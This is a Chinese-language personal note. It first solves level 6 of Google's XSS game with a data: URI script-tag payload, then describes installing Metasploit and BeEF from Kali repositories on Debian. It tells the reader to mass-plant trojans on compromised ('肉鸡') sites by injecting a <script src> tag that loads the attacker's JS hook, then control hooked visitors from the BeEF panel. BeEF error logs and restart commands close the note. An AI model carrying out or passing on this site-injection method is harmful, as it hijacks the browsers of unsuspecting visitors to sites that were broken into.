https://xss-game.appspot.com/level6第六关卡住了,要调用外界js应该是最后的解决方法,网上搜答案发现可以用

#data:text/javascript,alert('behindthefirewalls')构造出

<script src="data:text/javascript,alert('behindthefirewalls')"></script>
这样是可以执行的
data:text/....这是DATA URI Scheme
https://en.wikipedia.org/wiki/Data_URI_scheme 

使用的是debian

首先加入kali源

deb http://http.kali.org/kali kali-rolling main non-free contrib

更新可能会出现没有公钥,去“Linux常用操作”文章里搜

然后安装msf和beef

在肉鸡站(或者你自己的站)批量挂马

如果打不开,安装w3m

然后连接你服务器的3000端口,/ui/panel就可以了,新的功能还没试,原理搞清了

就是用<script src=”你的js木马文件”></script>加载你服务端的马

/usr/share/beef-xss/beef
[13:24:43][!] Unable to load extension 'xssrays'
[13:24:43][!] Unable to load extension 'admin_ui'
[13:24:43][!] Unable to load extension 'network'
[13:24:43][!] Unable to load extension 'events'
[13:24:43][!] Unable to load extension 'autoloader'
[13:24:43][!] Unable to load extension 'requester'
[13:24:43][!] Unable to load extension 'dns'
[13:24:43][!] Unable to load extension 'demos'
[13:24:43][!] Unable to load extension 'ipec'
[13:24:43][!] Unable to load extension 'social_engineering'
[13:24:43][!] Unable to load extension 'proxy'
[13:24:43][!] Unable to load extension 'console'
cd /usr/share/beef 
./beef -x

If you configure a password,try to restart msfconsole